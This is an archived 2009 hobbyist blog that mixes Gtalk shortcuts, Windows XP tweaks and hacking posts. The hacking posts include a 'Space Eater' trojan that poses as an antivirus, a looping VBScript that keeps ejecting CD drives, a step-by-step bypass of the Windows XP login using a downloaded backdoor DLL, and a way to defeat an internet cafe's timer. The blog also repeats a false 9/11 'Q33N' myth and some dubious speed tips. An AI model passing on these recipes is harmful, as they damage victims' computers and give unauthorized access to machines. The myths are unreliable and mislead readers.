Sep 7, 2009

G-Talk Shortcuts...

   Gtalk is the Widley Used Messenger all over the Internet ,People are now switching to Gtalk slowly and slowly leaving yahoo messenger due to some enhanced feature.So its necessary for new gtalk users to know more about Gtalk ,for this we have created a short Gtalk Tutorials that will help users while surfing gtalk .

Send Bold Text: Text embedded between two * characters is displayed as bold text. Example: This is a *bold* statement.

Send Italics Text: Text embedded between two _(underscore) characters is displayed as italics text. Example: This is an _italics_ statement
Insert Line Breaks: If you want to have a message that spans multiple paragraphs, just hold shift and hit enter
Send mail: Press F9 to send a mail to the contact with whom you are chatting
Restore Google Talk Window: Press windows key + Esc to restore Google Talk
window from system tray.
Call a Contact: Press F11 to start a voice call with the chat contact and F12 to end the voice call

Switch Windows – Hitting tab will cycle through open windows. It will select minimized conversations, to expand them just hit enter. If you just want to cycle through IM’s and don’t care about the buddy list, control-tab will do that and will automatically expand a minimized conversation if you settle on one.
Length Of A Single Message – A message can be max 32767 characters long.
Use Keyboard shortcuts while talking in Gtalk ,It will make yours work fast and talk Easy ,Below are some keyboard shortks for Gtalk User.
  • Ctrl + 5 (KeyPad) - Selects all the text typed.
  • Ctrl + 1 (NumPad) - It goes at the end of the last line.
  • Ctrl + 7 (NumPad) - It goes at the begin of the last line.
  • Ctrl + F4 – It closes the current window.
  • Alt + F4 - It closes the current window.
  • Alt + Esc – It Minimize the current open window.
  • Windows + ESC – Open Google Talk (if it’s minimized, or in the tray).
  • F9 - Open Gmail to send an email to the current contact.
Nickname Status Message:You can’t change your nickname in a way that other people will see it change. Every nickname in the Google Talk contactlist is the part that is before gmail.com (only the alphabetical characters are used) or the name you chosen for your GMail account. To change the nickname need to go to your Gmail account and change the name there. Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name. As a result all of your emails will have that nick as well, there is no way to seperate the two. You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.
  • F11 – It initiates a telephonic call with your friend.
  • F12 – It cancels a telephonic call.
  • Esc – It closes the current window
How To Make Conference Calls:To have conference calls in Gtalk: Open up a copy of Google Talk on all computers with which you wish to conference. After one copy is opened make a new shortcut for Google Talk but at the end of the target add /nomutex. If you installed it to the default folder then your shortcut should read
C:\Program Files\Google\Google Talk\googletalk.exe/nomutex.
Open Second instance of the software on every user’s computer.After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.
Login to multiple Google Talk accounts simultaneously with a very easy hack. Follow these steps
  1. Create a shortcut of Google Talk messenger on your desktop or any other preferred location .(To create a shortcut, right click on your Google Talk messenger application and select Send To–>Desktop(create shortcut) )
  2. Right click on the Google Talk messenger icon and select Properties option
  3. Modify target location text “c:\program files\google\google talk\googletalk.exe” /startmenu to
“c:\program files\google\google talk\googletalk.exe” /nomutex
  1. Click Ok and you are done with this .
Contacts: Don’t need to say yes or no when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this).

Make ur own Trojan...

   Most of you may be curious to know about how to make Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…
   Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan
   Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan along with it’s source code HERE.

How to compile, test and remove the damage?

Compilation:
You can use Borland C++ compiler (or equivalent) to compile the Trojan.
Testing:
To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.


All about "Trojan" -- http://en.wikipedia.org/wiki/Trojan_horse_(computing)

Aug 9, 2009

Unlimited time surfing in Cyber Cafes ...

    Al right Ladies And Hostile Men, We are gonna Learn How To Disable The Timer On The Computers On In Internet Cafe's.
   Al right Create A New Text Document, Then Type CMD In It, And Then Save It As a Batch File, And Then Run The New Batch File On Your Desktop. Then Command Prompt Should Open, Now You Type "cd\windows" to change the directory to Windows, than type in "regedit" to get to the registry editor gui, than navigate to "HKEY_CURRENT_USER>Appevents>software>classes> micr osoft>windows>current version>internet settings>policies>system" then on the right pane where it says Disable Task manager, right click on it, and scroll down to modify, and then change the value of it to "0", and then open Windows Task Manager By Holding Down These Keys, "CTRL+ALT+DEL/DELETE" And Then Disable The Internet Cafe's Timer, And WoohLAH, UNLIMTED TIME.    (NOTE : This will only work on Systems with in-built timer)

Make a CD Drive Opening Virus...

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If



copy this into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process

Jul 30, 2009

All abt Phishing attack ...

   Phishing is an attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by appearing as a trustworthy entity in an electronic communication. eBay, PayPal and other online banks are common targets. Phishing is typically carried out by email or instant messaging and often directs users to enter details at a website, although phone contact has also been used. Phishing is an example of social engineering techniques used to fool users.Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical measures.Recent phishing attempts have targeted the customers of banks and online payment services.Social networking sites such as Orkut are also a target of phishing.Spoofed/Fraudulent e-mails are the most widely used tools to carry out the phishing attack.In most cases we get a fake e-mail that appears to have come from a Trusted Website . Here the hacker may request us to verify username & password by replaying to a given email address.TECHNIQUES BEHIND PHISHING ATTACK1.Link ManipulationMost methods of phishing use some form of technical deception designed to make a link in an email appear to belong to some trusted organization or spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL -  www.micosoft.comwww.mircosoft.comwww.verify-microsoft. coming instead of http://www.microsoft.com/2. Filter EvasionPhishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing emails.This is the reason Gmail or Yahoo will disable the images by default for incoming mails.How does a phishing attack/scam look like?As scam artists become more sophisticated, so do their phishing e-mail messages and pop-up windows.They often include official-looking logos from real organizations and other identifying information taken directly from legitimate Web sites.Example of a phishing e-mail message, including a deceptive URL address linking to a scam Web site.To make these phishing e-mail messages look even more legitimate, the scam artists may place a link in them that appears to go to the legitimate Web site (1), but it actually takes you to a phishing site (2) or possibly a pop-up window that looks exactly like the official site.These copycat sites are also called “spoofed” Web sites. Once you’re at one of these spoofed sites, you may send personal information to the hackers.How to identify a fraudulent e-mail?Here are a few phrases to look for if you think an e-mail message is a phishing scam.“Verify your account.”Legitimate sites will never ask you to send passwords, login names, Social Security numbers, or any other personal information through e-mail.“If you don’t respond within 48 hours, your account will be closed.”These messages convey a sense of urgency so that you’ll respond immediately without thinking.“Dear Valued Customer.”Phishing e-mail messages are usually sent out in bulk and often do not contain your first or last name.“Click the link below to gain access to your account.”HTML-formatted messages can contain links or forms that you can fill out just as you’d fill out a form on a Web site. The links that you are urged to click may contain all or part of a real company’s name and are usually “masked,” meaning that the link you see does not take you to that address but somewhere different, usually a scam Web site.

   So the Bottom line to defend from phishing attack is -
1.   Never assume that an email is valid based on the sender’s email address.
2.  A trusted bank/organization such as paypal will never ask you for your full name and password in a PayPal email.
3.  An email from trusted organization will never contain any software.

10 Reasons why Web-Sites get hacked ...

1. Cross site scripting (XSS)
The problem: The “most prevalent and pernicious” Web application security vulnerability, XSS flaws happen when an application sends user data to a Web browser without first validating or encoding the content. This lets hackers execute malicious scripts in a browser, letting them hijack user sessions, deface Web sites, insert hostile content and conduct phishing and malware attacks.Attacks are usually executed with JavaScript, letting hackers manipulate any aspect of a page. In a worst-case scenario, a hacker could steal information and impersonate a user on a bank’s Web site.Real-world example: PayPal was targeted last year when attackers redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were redirected to a phishing site and prompted to enter PayPal login information, Social Security numbers and credit card details.How to protect users: Use a whitelist to validate all incoming data, which rejects any data that’s not specified on the whitelist as being good. This approach is the opposite of blacklisting, which rejects only inputs known to be bad. Additionally, use appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser.
2. Injection flaws
The problem: When user-supplied data is sent to interpreters as part of a command or query, hackers trick the interpreter which interprets text-based commands into executing unintended commands. Injection flaws allow attackers to create, read, update, or delete any arbitrary data available to the application. In the worst-case scenario, these flaws allow an attacker to completely compromise the application and the underlying systems, even bypassing deeply nested firewalled environments.Real-world example: Russian hackers broke into a Rhode Island government Web site to steal credit card data in January 2006. Hackers claimed the SQL injection attack stole 53,000 credit card numbers, while the hosting service provider claims it was only 4,113.How to protect users: Avoid using interpreters if possible. If you must invoke an interpreter, the key method to avoid injections is the use of safe APIs, such as strongly typed parameterized queries and object relational mapping libraries.
3. Malicious file execution
The problem: Hackers can perform remote code execution, remote installation of rootkits, or completely compromise a system. Any type of Web application is vulnerable if it accepts filenames or files from users. The vulnerability may be most common with PHP, a widely used scripting language for Web development.Real-world example: A teenage programmer discovered in 2002 that Guess.com was vulnerable to attacks that could steal more than 200,000 customer records from the Guess database, including names, credit card numbers and expiration dates. Guess agreed to upgrade its information security the next year after being investigated by the Federal Trade Commission.How to protect users: Don’t use input supplied by users in any filename for server based resources, such as images and script inclusions. Set firewall rules to prevent new connections to external Web sites and internal systems.
4. Insecure direct object reference
The problem: Attackers manipulate direct object references to gain unauthorized access to other objects. It happens when URLs or form parameters contain references to objects such as files, directories, database records or keys.Banking Web sites commonly use a customer account number as the primary key, and may expose account numbers in the Web interface.References to database keys are frequently exposed. An attacker can attack these parameters simply by guessing or searching for another valid key. Often, these are sequential in nature.Real-world example: An Australian Taxation Office site was hacked in 2000 by a user who changed a tax ID present in a URL to access details on 17,000 companies. The hacker e-mailed the 17,000 businesses to notify them of the security breach.How to protect users: Use an index, indirect reference map or another indirect method to avoid exposure of direct object references. If you can’t avoid direct references, authorize Web site visitors before using them
5. Cross site request forgery
The problem : simple and devastating this attack takes control of victim’s browser when it is logged onto a Web site, and sends malicious requests to the Web application. Web sites are extremely vulnerable, partly because they tend to authorize requests based on session cookies or “remember me” functionality. Banks are potential targets.Ninety-nine percent of the applications on the Internet are susceptible to cross site request forgery.Real-world example: A hacker known as Samy gained more than a million “friends” on MySpace.com with a worm in late 2005, automatically including the message “Samy is my hero” in thousands of MySpace pages. The attack itself may not have been that harmful, but it was said to demonstrate the power of combining cross site scripting with cross site request forgery. Another example that came to light one year ago exposed a Google vulnerability allowing outside sites to change a Google user’s language preferences.How to protect users: Don’t rely on credentials or tokens automatically submitted by browsers. The only solution is to use a custom token that the browser will not ‘remember'.
6. Information leakage and improper error handling
The problem: Error messages that applications generate and display to users are useful to hackers when they violate privacy or unintentionally leak information about the program’s configuration and internal workings.Web applications will often leak information about their internal state through detailed or debug error messages. Often, this information can be leveraged to launch or even automate more powerful attacks.Real-world example: Information leakage goes well beyond error handling, applying also to breaches occurring when confidential data is left in plain sight. The ChoicePoint debacle in early 2005 thus falls somewhere in this category. The records of 163,000 consumers were compromised after criminals pretending to be legitimate ChoicePoint customers sought details about individuals listed in the company’s database of personal information. ChoicePoint subsequently limited its sales of information products containing sensitive data.How to protect users: Use a testing tool such as OWASP’S WebScarab Project to see what errors your application generates. Applications that have not been tested in this way will almost certainly generate unexpected error output.
7. Broken authentication and session management
The problem: User and administrative accounts can be hijacked when applications fail to protect credentials and session tokens from beginning to end. Watch out for privacy violations and the undermining of authorization and accountability controls.Flaws in the main authentication mechanism are not uncommon, but weaknesses are more often introduced through ancillary authentication functions such as logout, password management, timeout, remember me, secret question and account update .Real-world example: Microsoft had to eliminate a vulnerability in Hotmail that could have let malicious JavaScript programmers steal user passwords in 2002. Revealed by a networking products reseller, the flaw was vulnerable to e-mails containing Trojans that altered the Hotmail user interface, forcing users to repeatedly reenter their passwords and unwittingly send them to hackers.How to protect users: Communication and credential storage has to be secure. The SSL protocol for transmitting private documents should be the only option for authenticated parts of the application, and credentials should be stored in hashed or encrypted form.Another tip: get rid of custom cookies used for authentication or session management.
8. Insecure cryptographic storage
The problem: Many Web developers fail to encrypt sensitive data in storage, even though cryptography is a key part of most Web applications. Even when encryption is present, it’s often poorly designed, using inappropriate ciphers.These flaws can lead to disclosure of sensitive data and compliance violations.Real-world example: The TJX data breach that exposed 45.7 million credit and debit card numbers. A Canadian government investigation faulted TJX for failing to upgrade its data encryption system before it was targeted by electronic eavesdropping starting in July 2005.How to protect users: Don’t invent your own cryptographic algorithms. Only use approved public algorithms such as AES, RSA public key cryptography, and SHA-256 or better for hashing.Furthermore, generate keys offline, and never transmit private keys over insecure channels.
9. Insecure communications
The problem: Similar to No. 8, this is a failure to encrypt network traffic when it’s necessary to protect sensitive communications. Attackers can access unprotected conversations, including transmissions of credentials and sensitive information. For this reason, PCI standards require encryption of credit card information transmitted over the Internet.Real-world example: TJX again. Investigators believe hackers used a telescope-shaped antenna and laptop computer to steal data exchanged wirelessly between portable price-checking devices, cash registers and store computers, the Wall Street Journal reported.“The $17.4-billion retailer’s wireless network had less security than many people have on their home networks,” the Journal wrote. TJX was using the WEP encoding system, rather than the more robust WPA.How to protect users: Use SSL on any authenticated connection or during the transmission of sensitive data, such as user credentials, credit card details, health records and other private information. SSL or a similar encryption protocol should also be applied to client, partner, staff and administrative access to online systems. Use transport layer security or protocol level encryption to protect communications between parts of your infrastructure, such as Web servers and database systems.
10. Failure to restrict URL access
The problem: Some Web pages are supposed to be restricted to a small subset of privileged users, such as administrators. Yet often there’s no real protection of these pages, and hackers can find the URLs by making educated guesses.The attacks targeting this vulnerability are called forced browsing, which encompasses guessing links and brute force techniques to find unprotected pages.Real-world example: A hole on the Macworld Conference & Expo Web site this year let users get “Platinum” passes worth nearly $1,700 and special access to a Steve Jobs keynote speech, all for free. The flaw was code that evaluated privileges on the client but not on the server, letting people grab free passes via JavaScript on the browser, rather than the server.How to protect users: Don’t assume users will be unaware of hidden URLs. All URLs and business functions should be protected by an effective access control mechanism that verifies the user’s role and privileges. Make sure this is done … every step of the way, not just once towards the beginning of any multistage process.

Jul 29, 2009

Add the Links toolbar to My Computer ...

   You know what would make a great tool bar???  One where you could put your favourite applications and documents so that you could open them from any window at any time. Guess what? You can and here's how: click Start, then My Computer. Now right-click the tool bar and then click Links. You now have the Links tool bar on your windows, just like in Internet Explorer. Note: Make sure that "Lock the Tool bars" is not checked. Click on it to deselect it if it is.The really cool thing about the Links tool bar is that it's completely customizable. Try this : Navigate to your favourite application and drag and drop its icon to the Links tool bar. You just created a short cut  Do this again and again for as many applications as you want to appear on the tool bar.

Make your own icons ...

It's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.Now add type,color, or do whatever you'd like to your image. I like to shrink photos(headshots work best) to 32x32 and simply paste them into my Paintdocument. When you're finished, open the File menu and click Save As.Use the dialog box to choose where you want to save your file, thengive it a name followed by ".ico" (without the quotes), and click Save.(The extension ".ico" tells Windows that it's an icon file.) You justcreated an icon! Now you can change any shortcut or folder to your ownicon—just browse to it on your hard drive.Make your own iconsIt's shockingly easy to create your own icons in Windows XP. Let's do it: Click Start, click All Programs, click Accessories, and then click Paint. On the Image menu, click Attributes. Type 32 for both the Width and Height of the document, and make sure that Pixels is selected under Units. Click OK to create a new 32x32-pixel document: the size of an icon.Now add type,color, or do whatever you'd like to your image. I like to shrink photos(headshots work best) to 32x32 and simply paste them into my Paintdocument. When you're finished, open the File menu and click Save As.Use the dialog box to choose where you want to save your file, thengive it a name followed by ".ico" (without the quotes), and click Save.(The extension ".ico" tells Windows that it's an icon file.) You justcreated an icon! Now you can change any shortcut or folder to your ownicon—just browse to it on your hard drive.

Auto-close non-respondin applications while Shutingdown ...i

HKEY_USERS.DEFAULTControl PanelDesktopValue Name:
AutoEndTasks, Data
Type: REG_SZ (String Value), Value Data: (0 = disabled, 1 = enabled).Modify the value of 'AutoEndTasks' to equal '1' to automatically end tasks or '0' to prompt for action.
Note: This change will affect all users but the value can also bechanged on a user-by-user basis by modifying [HKEY_CURRENT_USERControlPanelDesktop] with the same values

Clone ur Hard Disk ...

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all you needed, was already set up on your current system? Well, it is, and if you follow this tutorial, you shouldn't have much of a problem.Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.If you receive an error message, then remove the space from between XCOPY and C:\Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master,then check your new Master out.

Detect ur invisible Frnds. in Yahoo Messenger...

There are several tricks available in the Internet to find the yahoo messenger friend’s original status. Here is the one more simple way to find the user’s real status.The following site will tell you the real status of the yahoo id in the messenger.You just need to give your friends id. Your yahoo userid is not required.
http://detectinvisible.com/
http://www.ydetector.com/
http://www.vizgin.com/
http://www.invisible-scanner.com/

Multiple Yahoo messenger ...

To open two or more instance for logging in to multiple accounts perform the following registry edit.
Copy the text below:
REGEDIT4[HKEY_CURRENT_USER\Software\yahoo\pager\Test]“Plural”=dword:00000001
Then paste it in NOTEPAD and save it in “reg” extension,Open the saved registry file
Now you will be able to open multiple yahoo messenger.

Jul 7, 2009

Funny trick ...

   Try this naughty trick on your friends PC. Close all the open applications. While you are on the Desktop,
press Print Sceen key. Open Paint and then paste the captured image. Save it as BMP, right - click on the
desktop and change the wallpaper to the newly saved image. Go to the "Web" tab of the Display propeties dialog and turn on Active Desktop. Make sure that the "Hide icons when desktop is viewed as Web-page" is turned on. From now on, your friend wont be clicking an application icon on the desktop, just a picture of it. See their face when this happens! :

Want to hide your secret document? ...

Use the following steps to make a protected
folder that cannot be accessed from the Windows Explorer: Open MS-DOS prompt,
type mkdir followed by a space, then hold ALT key and type 251. Then release
ALT. Now you can save there anything you want to hide. Windows Explorer cannot
display the content of this folder. You can use these numbers instead of 251:
158, 159, 169, 176 to 224, 226 to 229, 231 to 240, 242 to 245, 247, 249, 252,
254 and 255.
For me, only 176, 249, 251 and 254 worked. To access this folder from windows,
just rename it into a normal name. To do so, open MS-DOS, enter the directory,
where your folder is placed and type ren followed by a space, then hold alt and
type the number, that you used when you created your folder. Press space again
and then type the new name of your folder. Press enter.

Jun 19, 2009

Hack a Window XP System ...

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this. Of course, do not do this on anyone elses computer without proper authorisation.
1. Get physical access to the machine. Remember that it must have a CD or DVD drive.
2. Download DreamPackPL HERE:-http://rapidshare.com/files/32846408/dreampackpl.zip
3. Unzip the downloaded dreampackpl.zip and you'll get dreampackpl.ISO.
4. Use any burning program that can burn ISO images.
5. After you have the disk, boot from the CD or DVD drive. You will see windows 2000 Setup and it will load some files.
6. Press "R" to install DreamPackPL.
7. Press "C" to install DreamPackPL by using the recovery console.
8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)
9. Backup your original sfcfiles.dll by typing:"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)
10. Copy the hacked file from CD to system32 folder. Type:"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)
11. Type "exit", take out disk and reboot.
12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.
13. Click the top graphic on the DreamPack menu and you will get a menu popup.
14. Go to commands and enable the options and enable the god command.
15. Type "god" in the password field to get in Windows.You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.

Double ur moblie speed ...

THIS IS ONLY FOR THOSE USER WHICH HAVE MEMORY CARD IN THEIR PHONES.FIRST NEED A COMPUTER.-USB CONNECTIVITY of MEMORY CARD TO PC(CARD READER) NOT BLUE TOOTHFOLLOWS THESE STEPS.
1.REMOVE MEMORY CARD FROM MOBILE.
2.INSERT IT IN CARD READER.
3.OPEN start menu>All program>accessories>system tools>DISK DEFRAGMENTER
4.JUST RUN DEFRAGMENTER AT YOUR MEMORY CARD.
5.FRAGMENT IT 2 OR 3 TIMES.
6.PUT BACK THE MEMORY CARD IN PHONE.
7.ENJOY THE "SPEED."

World Trade Center attack code ...

Did you know that the flight number of the plane that had hit WTC ...on 9/11 was Q33N ....

Open your Notepad in ur computer and type the flight number i.e Q33N...
Increase the Font Size to 72, Change the Font to Wingdings. U will be amazed by the findings.

Some say that, Pentagon received an anonymous email few days before 9/11. But they cudnt decode it before time and ignored it taking it to be a spam by any kid.

G-Talk tricks ...

Ctrl + E - It centralizes the selected text, or the current line.Ctrl + R - It justifies to the right the selected text, or the current line.Ctrl + L - It justifies to the left the selected text, or the current line.Ctrl + I - The same thing does that Tab.Tab - It is giving the area to each of the windows opened by Google Talk.Ctrl + Tab - The same thing does that Shift + Tab .Shift + Tab - The same thing does that Tab but in reverse.Ctrl + Shift + L -Switch between points, numbers, letters, capital letters, roman numbers and capital roman numbersCtrl + 1 (KeyPad) - It does a simple space between the lines.Ctrl + 2 (KeyPad) - It does a double space between the lines.Ctrl + 5 (KeyPad) - A space does 1.5 between the lines.Ctrl + 1 (NumPad) - It goes at the end of the last line.Ctrl + 7 (NumPad) - It goes at the begin of the last line.Ctrl + F4 - It closes the current window.Alt + F4 - It closes the current window.Alt + Esc - It Minimize all the windows.Windows + ESC - Open Google Talk (if it's minimized, or in the tray)F9 - Open Gmail to send an email to the current contact.F11 - It initiates a telephonic call with your friend.F12 - It cancels a telephonic call.Esc - It closes the current window.

Keep ur system fit n fine ...

1. Let your PC boot up completely before opening any applications.
2. Refresh the desktop after closing any application. This will remove any unused files from the RAM.
3. Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).It takes much more memory from RAM.
4. Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM.
5. Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.
6. Delete the temporary internet files regularly.
7. Defragment your hard drive once every 15 days. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.
8. Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.
9. When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.
10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.

Best Bit Torrents search engines ...

This summary is not available. Please click here to view the post.

Bring back the missing 'Folder' option in a window explorer ...

Many of us sometimes find the folder options missing in windows explorer.Enable it just by some simple steps.Open Run and then type "gpedit.msc".Now goto User Configuration > Administrative templates > Windows Component > Windows Explorer.Click on Windows Explorer you will find the 3rd option on the right side of screen "Removes the Folder Option menu item from the Tools menu"Just check it, if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured.I hopes that you will find the option.

Hide ur files in a jpeg file...

1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\hidden - RECOMMENDED).
2. Now, add those files in a RAR archive (e.g. secret.rar). This file should also be in the same directory (C:\hidden).
3. Now, look for a simple JPEG picture file (e.g. logo.jpg). Copy/Paste that file also in C:\hidden.
4. Now, open Command Prompt (Go to Run and type ‘cmd‘). Make your working directory C:\hidden.
5. Now type: “COPY /b logo.jpg + secret.rar output.jpg” (without quotes) - Now, logo.jpg is the picture you want to show, secret.rar is the file to be hidden, and output.jpg is the file which contains both the files.
6. Now, after you have done this, you will see a file output.jpg in C:\hidden. Open it (double-click) and it will show the picture you wanted to show. Now try opening the same file with WinRAR, it will show the hidden archive .You can also check the file size of output file.

20 Things about Windows XP ...

It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).


You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).


You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.


For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.


XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.


You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.


XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.


XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.


You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.


You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.


Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.


You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.


